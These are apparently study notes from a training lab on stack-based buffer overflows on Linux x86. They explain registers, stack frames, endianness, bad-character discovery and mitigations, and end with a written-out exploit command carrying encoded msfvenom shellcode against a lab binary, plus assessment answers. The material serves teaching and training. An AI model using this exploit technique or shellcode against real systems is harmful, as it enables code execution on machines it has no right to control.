💮Stack Based Buffer Overflow
Stack-Based Buffer Overflows on Linux x86
Contents
Introduction
Buffer Overflows Overview
Exploit Development Introduction
CPU Architecture
Memory
Central Processing Unit
RISC
CISC
Instruction Cycle
Fundamentals
Stack-Based Buffer Overflow
The Memory
Disable ASLR
Compile C code to a 32bit ELF binary
AT&T Syntax
Break down the info
Intel Syntax
Change GDB Syntax
Q: At which address in the "main" function does the "bowfunc" function get called?
CPU Registers
Data registers
Pointer registers
Stack frames
Prologue
Epilogue
Index registers
Endianness
Exploit
Take Control of EIP
Determine the Length for Shellcode
Use in practice
Identification of Bad Characters
Breakpoints
Sending the characters
Q: Find all bad characters that change or interrupt our sent bytes' order and submit them as the answer (e.g., format: \x00\x11).
Generating Shellcode
MSFvenom Syntax
MSFvenom - Generate Shellcode
Shellcode
Exploit with shellcode
The Stack
Identification of the Return Address
GDB NOPS
Exploitation
Proof-Of-Concept
Public Exploit Modification
Prevention Techniques and Mechanisms
Skills Assessment
Skills Assessment - Buffer Overflow
Cheat Sheet
Check filetype
objdump
File
Open the file
Set syntax to Intel
Disassemble file
Determine offset with MSFvenom
Run file
Check EIP memory address
Find gdb offset with MSFvenom
Determine that you have found the offset
Determine length of shellcode
Shellcode calculation with NOPs
In gdb
Check bad characters
Characters
Notes
Find where we need to break a function
Make breakpoint
Send CHARS
Checking stack
Make shellcode
Shellcode
Notes
Run shellcode
Check stack
Find return address
Convert to little endian
Edit return address
Final exploit
Introduction
Buffer Overflows Overview
Less common nowadays due to memory protections in modern compilers
C and other languages are still prevalent in embedded systems and IoT
CVE-2021-3156: Recent heap-based buffer overflow in sudo
Web applications can also experience buffer overflows, such as CVE-2017-12542 with HP iLO devices
Incorrect program code can manipulate CPU processing, causing crashes, data corruption, or harm to data structures
Attackers can execute commands with vulnerable process privileges by overwriting return addresses with arbitrary data
Root access is a popular target, but buffer overflows leading to standard user privileges can still be dangerous
The Von-Neumann architecture contributes to buffer overflow vulnerabilities because code and data share the same memory
C and C++ languages do not automatically monitor memory buffer limits, leading to increased vulnerability
Java is less likely to experience buffer overflow conditions because its runtime manages memory (garbage collection) and checks array bounds.
Buffer overflows are caused by incorrect program code that cannot handle more data than it expects; the excess overwrites adjacent memory, such as saved registers, and can lead to code execution.
This happens when data is written to a reserved memory buffer or the stack without a length limit. To prevent it, programs should enforce limits on how much data is written into their buffers.
Exploit Development Introduction
Exploit development takes place in the Exploitation phase, after a specific software version has been identified as exploitable.
Developing our own exploits
Very complex
Requires a deep understanding of CPU operations
and of the functions of the software that serves as our target
To write exploits we use Python.
Exploit code or programs are often called a proof-of-concept (PoC)
Types of exploits
0-day
Newly identified vulnerability
Not public
The developer does not know about it yet
Persists through new updates until it is discovered and patched
N-day
Local
Executed when opening a file
PDF
Macro (.docx)
Remote
Get payload running on system
Executed over network
DoS
WebApp
CPU Architecture
CPUs use the Von-Neumann architecture
Four functional units
Memory
Control Unit
Arithmetic Logic Unit
Input/Output Unit
The most important units, the Arithmetic Logic Unit (ALU) and the Control Unit (CU), are combined into the Central Processing Unit (CPU).
ALU + CU = CPU
They are responsible for executing
Instructions
Flow control
Commands and data are fetched from memory
Bus system
Connection between
Processor
Memory
Input/output unit
All data is transferred via the bus system
Von-Neumann Architecture

Memory
Primary Memory
Cache
Buffer
Always fed with data and code
Random Access Memory (RAM)
Describes memory type
Memory addresses
Secondary Memory
External storage
HDD/SSD
Flash Drives
CD/DVD-ROMs
Not directly accessed by the CPU
Uses the I/O interface
Higher storage capacity
Control Unit
Reading data from the RAM
Saving data in RAM
Provide, decode and execute an instruction
Processing the inputs from peripheral devices
Processing of outputs to peripheral devices
Interrupt control
Monitoring of the entire system
The CU contains the Instruction Register (IR)
Central Processing Unit
Often called the Microprocessor
CPU architectures
x86/i386 - (AMD & Intel)
x86-64/amd64 - (Microsoft & Sun)
ARM - (Acorn)
RISC
Reduced Instruction Set Computer
Simplifies the complexity of the instruction set for assembly
RISC processors are used in most phones
Fixed length
32-bit
64-bit
CISC
Complex Instruction Set Computer
CISC does not require a fixed 32-bit or 64-bit instruction word. An instruction can be as short as 8 bits
Instruction Cycle
Taken from the Academy:
| Instruction | Description |
| --- | --- |
| 1. FETCH | The next machine instruction address is read from the Instruction Address Register (IAR). It is then loaded from the Cache or RAM into the Instruction Register (IR). |
| 2. DECODE | The instruction decoder converts the instructions and starts the necessary circuits to execute the instruction. |
| 3. FETCH OPERANDS | If further data have to be loaded for execution, these are loaded from the cache or RAM into the working registers. |
| 4. EXECUTE | The instruction is executed. This can be, for example, operations in the ALU, a jump in the program, the writing back of results into the working registers, or the control of peripheral devices. Depending on the result of some instructions, the status register is set, which can be evaluated by subsequent instructions. |
| 5. UPDATE INSTRUCTION POINTER | If no jump instruction has been executed in the EXECUTE phase, the IAR is now increased by the length of the instruction so that it points to the next machine instruction. |
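The five phases can be sketched as a small loop. This is only a toy model: the instruction names (LOAD, ADD, JMP, HALT), the single `acc` register, and the `run` function are invented for illustration and are not real x86 instructions.

```python
# Toy model of the instruction cycle. The instruction names (LOAD, ADD, JMP,
# HALT) are made up for this sketch and are not real x86 instructions.

def run(program, max_steps=100):
    iar = 0   # Instruction Address Register: index of the next instruction
    acc = 0   # a single working register
    for _ in range(max_steps):
        ir = program[iar]            # 1. FETCH into the Instruction Register
        opcode, operand = ir         # 2. DECODE
        jumped = False
        # 3. FETCH OPERANDS is trivial here: the operand is part of the instruction.
        if opcode == "LOAD":         # 4. EXECUTE
            acc = operand
        elif opcode == "ADD":
            acc += operand
        elif opcode == "JMP":
            iar = operand
            jumped = True
        elif opcode == "HALT":
            return acc
        else:
            raise ValueError(f"unknown opcode: {opcode}")
        if not jumped:               # 5. UPDATE INSTRUCTION POINTER
            iar += 1
    raise RuntimeError("step limit reached without HALT")


PROGRAM = [
    ("LOAD", 2),
    ("ADD", 3),
    ("JMP", 4),      # jumps over the next instruction
    ("ADD", 100),
    ("HALT", None),
]

print(run(PROGRAM))  # prints 5
```

Note how the JMP sets the IAR itself, so step 5 is skipped for that instruction. Taking control of the instruction pointer is exactly what the exploit later in these notes is about.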
Fundamentals
Stack-Based Buffer Overflow
Binary files
Portable Executable Format (PE)
Used on Microsoft Windows
Executable and Linking Format (ELF)
Used on UNIX-like systems such as Linux
The Memory

.text
assembler instructions
.data
global and static variables
.bss
statically allocated variables that are represented exclusively by 0 bits
Heap
starts at the end of .bss and grows toward higher memory addresses
The Stack
Last-In-First-Out
Defined in RAM
Accessed via a stack pointer
Disable ASLR
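On Linux, ASLR is controlled by the file /proc/sys/kernel/randomize_va_space. Writing 0 to it as root turns randomization off until the value is changed back or the system reboots. As a minimal sketch, the Python below only reads the current setting so we can confirm the state before debugging. The helper names `describe_aslr` and `read_aslr` are made up for this example.

```python
from pathlib import Path

ASLR_PATH = Path("/proc/sys/kernel/randomize_va_space")

# Meaning of the values according to the Linux kernel sysctl documentation.
ASLR_MODES = {
    "0": "disabled",
    "1": "conservative randomization (stack, mmap base, VDSO)",
    "2": "full randomization (additionally the heap)",
}


def describe_aslr(raw: str) -> str:
    """Translate the raw file content into a human-readable description."""
    return ASLR_MODES.get(raw.strip(), "unknown value")


def read_aslr(path: Path = ASLR_PATH):
    """Return the ASLR description, or None if the file cannot be read."""
    try:
        return describe_aslr(path.read_text())
    except OSError:
        return None


if __name__ == "__main__":
    print(read_aslr())
```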
Compile C code to a 32bit ELF binary
AT&T Syntax
Disassemble main
Break down the info
First column
**Hexadecimals** that represent the memory addresses
| Memory Address | Address Jumps | Assembler Instruction | Operation Suffixes |
| --- | --- | --- | --- |
| 0x00000582 | <+0>: | lea | 0x4(%esp),%ecx |
| 0x00000586 | <+4>: | and | $0xfffffff0,%esp |
| ... | ... | ... | ... |
Intel Syntax
Change GDB Syntax
Q: At which address in the "main" function does the "bowfunc" function get called?
Attack chain
Check filetype
Open up file in gdb
Set the syntax to intel
Check out bowfunc
Screenshot:

Then we just read the hexadecimal memory address from the line that calls bowfunc.
CPU Registers
Registers offer a small amount of storage space where data can be stored temporarily.
Types of registers
General registers
Data registers
Pointer registers
Index registers
Control registers
Segment registers
Data registers
| 32-bit Register | 64-bit Register | Description |
| --- | --- | --- |
| EAX | RAX | Accumulator is used in input/output and for arithmetic operations |
| EBX | RBX | Base is used in indexed addressing |
| ECX | RCX | Counter is used to rotate instructions and count loops |
| EDX | RDX | Data is used for I/O and in arithmetic operations for multiply and divide operations involving large values |
Pointer registers
| 32-bit Register | 64-bit Register | Description |
| --- | --- | --- |
| EIP | RIP | Instruction Pointer stores the offset address of the next instruction to be executed |
| ESP | RSP | Stack Pointer points to the top of the stack |
| EBP | RBP | Base Pointer is also known as Stack Base Pointer or Frame Pointer that points to the base of the stack |
Stack Frames
The stack starts with a high address and grows down to low memory addresses.
The Base Pointer points to the beginning (base) of the stack and the Stack Pointer points to the top of the stack.
The stack is divided into regions called Stack Frames that allocate memory for functions as they are called.
A stack frame defines a frame of data with the beginning (EBP) and the end (ESP).
The stack memory is built on a Last-In-First-Out (LIFO) data structure.
Prologue
In the prologue, the previous EBP is pushed onto the stack, EBP is set to the current ESP, and ESP is then moved further down to make room for the function's local variables and operations.
Epilogue
In the epilogue, ESP is set back to the current EBP, and EBP is restored to the value it had at the start of the function. The epilogue is short and can be done in different ways, but our example does it with only two instructions.
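To see how ESP and EBP move through a prologue and epilogue, here is a small simulation. It is a sketch under assumptions: the `Stack` class, the start addresses, and the 16-byte local area are invented, and the comments name the typical x86 instructions (push/mov/sub, then leave/ret) rather than the exact ones from the disassembly in these notes.

```python
class Stack:
    """Very small model of a 32-bit stack that grows toward lower addresses."""

    def __init__(self, esp=0x1000, ebp=0x1010):
        self.mem = {}
        self.esp = esp
        self.ebp = ebp

    def push(self, value):
        self.esp -= 4
        self.mem[self.esp] = value

    def pop(self):
        value = self.mem[self.esp]
        self.esp += 4
        return value


def call_and_return(stack, return_address, locals_size):
    caller = (stack.esp, stack.ebp)

    stack.push(return_address)        # call: save where to continue afterwards

    # Prologue
    stack.push(stack.ebp)             # push ebp
    stack.ebp = stack.esp             # mov ebp, esp
    stack.esp -= locals_size          # sub esp, <size of locals>
    frame = (stack.ebp, stack.esp)    # frame spans from EBP down to ESP

    # Epilogue
    stack.esp = stack.ebp             # leave, part 1: mov esp, ebp
    stack.ebp = stack.pop()           # leave, part 2: pop ebp
    eip = stack.pop()                 # ret: pop the return address into EIP

    return caller, frame, (stack.esp, stack.ebp), eip


caller, frame, after, eip = call_and_return(Stack(), 0x56555600, 16)
print("frame EBP/ESP:", [hex(v) for v in frame])
print("restored:", after == caller, "EIP:", hex(eip))
```

The value popped by `ret` comes straight from the stack, which is why overwriting that slot redirects execution.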
Index registers
| Register 32-bit | Register 64-bit | Description |
| --- | --- | --- |
| ESI | RSI | Source Index is used as a pointer from a source for string operations |
| EDI | RDI | Destination is used as a pointer to a destination for string operations |
Endianness
During load and save operations in registers and memory, the bytes of a multi-byte value can be stored and read in different orders. This byte order is called endianness. Endianness is distinguished between the little-endian format and the big-endian format.
Big-endian and little-endian describe the order of significance. In big-endian, the most significant byte comes first. In little-endian, the least significant byte comes first. Mainframe processors, some RISC architectures, and minicomputers use the big-endian format, and the byte order in TCP/IP networks is also big-endian.
Now, let us look at an example with the following values:
Address: 0xffff0000
Word: \xAA\xBB\xCC\xDD

| Memory Address | 0xffff0000 | 0xffff0001 | 0xffff0002 | 0xffff0003 |
| --- | --- | --- | --- | --- |
| Big-Endian | AA | BB | CC | DD |
| Little-Endian | DD | CC | BB | AA |
This is very important for us to enter our code in the right order later when we have to tell the CPU to which address it should point.
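The same example can be checked with Python's `struct` module, where `>` selects big-endian and `<` selects little-endian packing. This is just a quick sketch; the `dump` helper is made up for the printout.

```python
import struct

WORD = 0xAABBCCDD
BASE = 0xffff0000

big = struct.pack(">I", WORD)      # most significant byte first
little = struct.pack("<I", WORD)   # least significant byte first


def dump(label, data):
    """Print each byte next to the address it would occupy."""
    cells = " ".join(f"{BASE + i:#x}:{byte:02X}" for i, byte in enumerate(data))
    print(f"{label:<14}{cells}")


dump("Big-Endian", big)
dump("Little-Endian", little)
```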
Exploit
Take Control of EIP
We need to get the instruction pointer (EIP) under control so that we can tell it which address to jump to.
We then point it to the address where our shellcode starts, and the CPU executes it.
Segmentation Fault
Here we use a Python one-liner to pass 1200 "U" characters (\x55) to the program. The program crashes with a segmentation fault, and we have indeed overwritten the EIP.
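Why the EIP ends up full of "U"s can be illustrated with a simulation of the stack frame. This is only a model under assumptions: the 1024-byte buffer size, the saved EBP, and the saved return address are hypothetical values, and `simulate_overflow` is an invented helper that mimics a copy without a bounds check.

```python
import struct


def simulate_overflow(buffer_size: int, payload: bytes) -> int:
    """Model a frame as [buffer][saved EBP][return address] and copy into it
    without checking the buffer size. Returns the resulting return address."""
    saved_ebp = struct.pack("<I", 0xffffd6f8)        # hypothetical value
    return_address = struct.pack("<I", 0x56555600)   # hypothetical value
    frame = bytearray(buffer_size) + saved_ebp + return_address

    # Unchecked copy: writes as many bytes as the payload has
    # (clipped only to the part of memory this model covers).
    count = min(len(payload), len(frame))
    frame[:count] = payload[:count]

    return struct.unpack("<I", bytes(frame[-4:]))[0]


print(hex(simulate_overflow(1024, b"U" * 100)))    # return address untouched
print(hex(simulate_overflow(1024, b"U" * 1200)))   # 0x55555555
```

Input that fits into the buffer leaves the return address alone. Longer input runs over the saved EBP and the return address, which is the value the CPU loads into EIP when the function returns.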
Determine the Length for Shellcode
Make shellcode with msfvenom
Now we can see that our payload is 68 bytes.
We place no-operation instructions (NOPs, \x90) in front of the shellcode. They do nothing except pass execution on to the next byte, so the return address only has to land somewhere in the NOPs for execution to slide into the shellcode.
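The lengths of the individual parts have to add up exactly, so it helps to calculate them instead of guessing. In this sketch the offset of 1036 and the 68-byte shellcode come from these notes, while the 100-byte NOP block and the `buffer_layout` helper are assumptions for illustration.

```python
def buffer_layout(eip_offset: int, nop_len: int, shellcode_len: int, ret_len: int = 4):
    """Split the bytes in front of EIP into padding, NOPs, and shellcode."""
    padding = eip_offset - nop_len - shellcode_len
    if padding < 0:
        raise ValueError("NOPs and shellcode do not fit in front of EIP")
    return [
        ("padding", padding),
        ("NOPs", nop_len),
        ("shellcode", shellcode_len),
        ("return address", ret_len),
    ]


layout = buffer_layout(eip_offset=1036, nop_len=100, shellcode_len=68)
for name, length in layout:
    print(f"{name:<15}{length:>5} bytes")
print(f"{'total':<15}{sum(length for _, length in layout):>5} bytes")
```

With these numbers the padding is 868 bytes and the total is 1040 bytes (offset plus the 4 bytes that overwrite EIP). If the shellcode grows, only the padding shrinks and the return address stays at the same offset.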
Shellcode - Length
How the buffer will look:

Use in practice
Command:
In gdb:
Identification of Bad Characters
Bad characters:
\x00 - Null Byte
\x0A - Line Feed
\x0D - Carriage Return
\xFF - commonly listed as a bad character (the ASCII Form Feed itself is \x0C)
To find it we can use this character list: CHARS="\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
With this list, we can look for bad characters by running the previous command again, this time with the character list as our payload.
Breakpoints
To set a breakpoint at a function in GDB, we use break *function (for example, break *bowfunc)
Sending the characters
To look at the stack:
We look for where the run of 0x55 bytes ends, because our characters start right after it.
Wherever a null byte (\x00) appears in place of a character we sent, that character is a bad character.
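Comparing the stack dump by eye is error-prone, so the check can be sketched in Python. The helper names are invented, and the "observed" bytes below are simulated for the example; in practice they would be copied out of the GDB stack dump.

```python
def all_bytes(exclude: bytes = b"") -> bytes:
    """Every byte value from 0x00 to 0xff, minus the known bad characters."""
    return bytes(b for b in range(256) if b not in exclude)


def first_mismatch(sent: bytes, observed: bytes):
    """Return (index, sent_byte) of the first difference, or None if all match."""
    for index, (s, o) in enumerate(zip(sent, observed)):
        if s != o:
            return index, s
    if len(observed) < len(sent):
        # The input was cut off here.
        return len(observed), sent[len(observed)]
    return None


# Simulated run: \x00 was already removed, and \x09 came back as a null byte.
sent = all_bytes(exclude=b"\x00")
observed = sent.replace(b"\x09", b"\x00")

index, bad = first_mismatch(sent, observed)
print(f"first bad character: \\x{bad:02x} at position {index}")
```

After each finding, the bad character is added to `exclude` and the run is repeated until `first_mismatch` returns None.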
Q: Find all bad characters that change or interrupt our sent bytes' order and submit them as the answer (e.g., format: \x00\x11).
\x00\x09\x0A\x20
Generating Shellcode
When generating shellcode, pay attention to these areas:
Architecture
Platform
Bad Characters
MSFvenom Syntax
MSFvenom - Generate Shellcode
Shellcode
Exploit with Shellcode
The Stack
Identification of the Return Address
GDB NOPS
This picture illustrates where the address 0xffffd64c is.

After selecting a memory address, we replace the "\x66" bytes that overwrite the EIP with that address, so that execution jumps to 0xffffd64c. Note that the address is entered backward, in little-endian order: \x4c\xd6\xff\xff.
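Reversing the bytes by hand is an easy place to make a typo. As a small sketch, the helper below (the name `to_little_endian_escape` is made up) turns a 32-bit address into the escaped form used in the command line.

```python
import struct


def to_little_endian_escape(address: int) -> str:
    """Format a 32-bit address as \\x-escaped bytes in little-endian order."""
    return "".join(f"\\x{byte:02x}" for byte in struct.pack("<I", address))


print(to_little_endian_escape(0xffffd64c))  # \x4c\xd6\xff\xff
print(to_little_endian_escape(0xffffd68a))  # \x8a\xd6\xff\xff
```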
Exploitation
Proof-Of-Concept
Public Exploit Modification
When working with exploits, public ones might not work in your case. That is why we should learn how to edit and write exploits, so we can fine-tune them to our own use case.
Prevention Techniques and Mechanisms
Security mechanisms that help prevent this:
Canaries: known values written to the stack between the buffer and the control data, to detect buffer overflows
Address Space Layout Randomization (ASLR): makes it difficult to find target addresses in memory
Data Execution Prevention (DEP): marks memory regions such as the stack as non-executable, so that injected code cannot run there
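The idea behind canaries can be sketched with a few lines of Python. This is a simplified model, not how a compiler implements it: the frame layout, the hypothetical return address, and the `overflow_detected` helper are assumptions for illustration.

```python
import os


def overflow_detected(buffer_size: int, payload: bytes, canary: bytes = None) -> bool:
    """Model a frame as [buffer][canary][return address], copy the payload in
    without a bounds check, and report whether the canary was changed."""
    if canary is None:
        canary = os.urandom(4)                 # unpredictable value per run
    return_address = b"\x00\x56\x55\x56"       # hypothetical value
    frame = bytearray(buffer_size) + canary + return_address

    count = min(len(payload), len(frame))
    frame[:count] = payload[:count]            # unchecked copy

    stored = bytes(frame[buffer_size:buffer_size + 4])
    return stored != canary                    # checked before the function returns


print(overflow_detected(16, b"A" * 16))  # False: payload fits exactly
print(overflow_detected(16, b"A" * 24))  # True (unless the random canary is "AAAA")
```

Because the canary sits between the buffer and the return address, an overflow cannot reach the return address without changing the canary first, and the program can abort before the overwritten address is used.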
Skills Assessment
Skills Assessment - Buffer Overflow
Q: Determine the file type of "leave_msg" binary and submit it as the answer.
First, we need to take control of the EIP.
To do this, we need to find the memory address where our padding characters end and where the payload starts.
Attack chain:

End memory address is 0xffffd68a
Convert it to little endian
0xffffd68a -> \x8A\xD6\xFF\xFF
Now our final payload will be
We run the program outside gdb
gdb -q leave_msg
./leave_msg $(python -c 'print "\x55" * (2060 - 124 - 95 - 4) + "\x90" * 124 + "\xd9\xeb\xd9\x74\x24\xf4\x5d\x29\xc9\xb8\xfc\x4b\xe3\x50\xb1\x12\x31\x45\x17\x03\x45\x17\x83\x39\x4f\x01\xa5\xf0\x8b\x32\xa5\xa1\x68\xee\x40\x47\xe6\xf1\x25\x21\x35\x71\xd6\xf4\x75\x4d\x14\x86\x3f\xcb\x5f\xee\xc0\x2b\xa0\xef\x56\x2e\xa0\xfe\xfa\xa7\x41\xb0\x65\xe8\xd0\xe3\xda\x0b\x5a\xe2\xd0\x8c\x0e\x8c\x84\xa3\xdd\x24\x31\x93\x0e\xd6\xa8\x62\xb3\x44\x78\xfc\xd5\xd8\x75\x33\x95" + "\x8A\xD6\xFF\xFF"')
Cheat sheet
Check filetype
Objdump
File
or
Open the file
Set syntax to Intel
Disassemble file
Determine offset with MSFvenom
MSFvenom
then cat the output
Run file
Check EIP memory address
EIP displays a different memory address
Use this address to find the offset
Find gdb offset with MSFvenom
gdb offset with MSFvenom
Use the offset that you found
The offset is 1036 in this case
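How a unique pattern leads to the offset can be sketched in Python. The generator below follows the same idea as the well-known "Aa0Aa1Aa2..." pattern, but it is a sketch and not the tool itself. The EIP value 0x69423569 is an illustrative assumption, chosen because it maps to the offset of 1036 mentioned above.

```python
import string
import struct
from itertools import product


def pattern_create(length: int) -> bytes:
    """Build a non-repeating pattern: Aa0Aa1Aa2 ... Aa9Ab0Ab1 ..."""
    out = bytearray()
    triples = product(string.ascii_uppercase, string.ascii_lowercase, string.digits)
    for upper, lower, digit in triples:
        out += (upper + lower + digit).encode("ascii")
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(eip_value: int, length: int = 1200) -> int:
    """Find where the 4 bytes seen in EIP sit inside the pattern (-1 if absent)."""
    needle = struct.pack("<I", eip_value)   # EIP shows the bytes in little-endian
    return pattern_create(length).find(needle)


print(pattern_create(12))                   # b'Aa0Aa1Aa2Aa3'
print(pattern_offset(0x69423569))           # 1036
```

Because every 4-byte window of the pattern is unique, the value that lands in EIP identifies exactly how many bytes come before the return address.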
Determine that you have found the offset
Determine length of shellcode
68 bytes
Shellcode calculation with NOPs
NOPs
In gdb
gdb
Check bad characters
Characters
Notes
Find where we need to break a function
output
Make breakpoint
Send CHARS
output
Checking stack
Then find where the \x55 bytes end and check for every null byte (\x00)
Make shellcode
output
Shellcode
output
Notes
Run shellcode
output
Check stack
output
Find return address
Needs a breakpoint!

End memory address is 0xffffd68a
Convert to little endian
Online Hex Converter - Bytes, Ints, Floats, Significance, Endians (SCADACore)
0xffffd68a -> \x8A\xD6\xFF\xFF
Edit return address
old:
new:
Final exploit
This is run outside gdb